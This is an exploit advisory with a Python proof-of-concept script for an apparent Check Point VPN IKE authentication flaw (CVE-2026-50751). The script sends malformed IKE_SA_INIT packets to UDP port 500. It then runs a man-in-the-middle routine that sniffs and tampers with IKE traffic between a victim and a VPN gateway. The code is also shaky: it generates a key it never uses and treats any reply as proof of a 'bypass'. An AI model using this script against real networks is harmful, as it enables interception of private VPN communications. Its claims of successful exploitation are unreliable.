================================================================================================================================== | # Title : Check Point VPN IKE Legacy Auth Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) | | # Vendor : No standalone download available | ================================================================================================================================== [+] Summary : A Python script attempting to exploit a vulnerability in Check Point VPN (CVE-2026-50751) by sending a malformed IKE_SA_INIT packet to UDP port 500, detecting whether the target responds as an indicator of exploitability, then executing a MITM attack to intercept IKE packets between a victim and a VPN gateway. [+] POC : #!/usr/bin/env python3 import socket import struct import sys import time from scapy.all import * from cryptography.hazmat.primitives.asymmetric import x25519 from cryptography.hazmat.primitives import serialization class CVE202650751Exploit: def __init__(self, target_ip, target_port=500): self.target_ip = target_ip self.target_port = target_port self.sock = None def create_ike_sa_init(self): """Create a fake IKE_SA_INIT package""" ike_header = struct.pack('!BBBB I I I', 0x20, 0x20, 0x00, 0x00, 0x00000001, 0x00000000, 0x00000001 ) legacy_payload = bytes([ 0x20, 0x00, 0x00, 0x04, 0x01, 0x02, 0x03, 0x04 ]) return ike_header + legacy_payload def exploit_legacy_auth(self): """Exploiting weak authentication from existing customers""" print(f"[*] Targeting {self.target_ip}:{self.target_port}") private_key = x25519.X25519PrivateKey.generate() public_key = private_key.public_key() packet = IP(dst=self.target_ip)/UDP(sport=random.randint(45000, 65535), dport=self.target_port) ike_data = self.create_ike_sa_init() print("[*] Sending malicious IKE packet...") try: response = sr1(packet/Raw(load=ike_data), timeout=3, verbose=0) if response: print("[+] Received response - Target may be vulnerable") return True except Exception as e: print(f"[-] Exploit failed: {e}") return False def mitm_attack(self, victim_ip, vpn_gateway): """Man-in-the-middle attack to intercept VPN communications""" print(f"[*] Starting MITM attack between {victim_ip} and {vpn_gateway}") def packet_handler(pkt): if IP in pkt and UDP in pkt: if pkt[UDP].dport == 500 or pkt[UDP].sport == 500: print(f"[+] Intercepted IKE packet from {pkt[IP].src}") modified_payload = pkt[Raw].load + b'\x00\x00\x00\x01BAD' send(IP(src=pkt[IP].dst, dst=pkt[IP].src)/ UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport)/ Raw(load=modified_payload), verbose=0) sniff(filter=f"host {victim_ip} and host {vpn_gateway} and port 500", prn=packet_handler, store=0) def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} [victim_ip]") sys.exit(1) exploit = CVE202650751Exploit(sys.argv[1]) if exploit.exploit_legacy_auth(): print("\n[!] VULNERABLE - Legacy client authentication bypass possible!") print("[!] CVE-2026-50751 exploitation successful") if len(sys.argv) == 3: print(f"[*] Initiating MITM attack against {sys.argv[2]}") exploit.mitm_attack(sys.argv[2], sys.argv[1]) else: print("\n[+] Target appears patched or not vulnerable") if __name__ == "__main__": main() Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================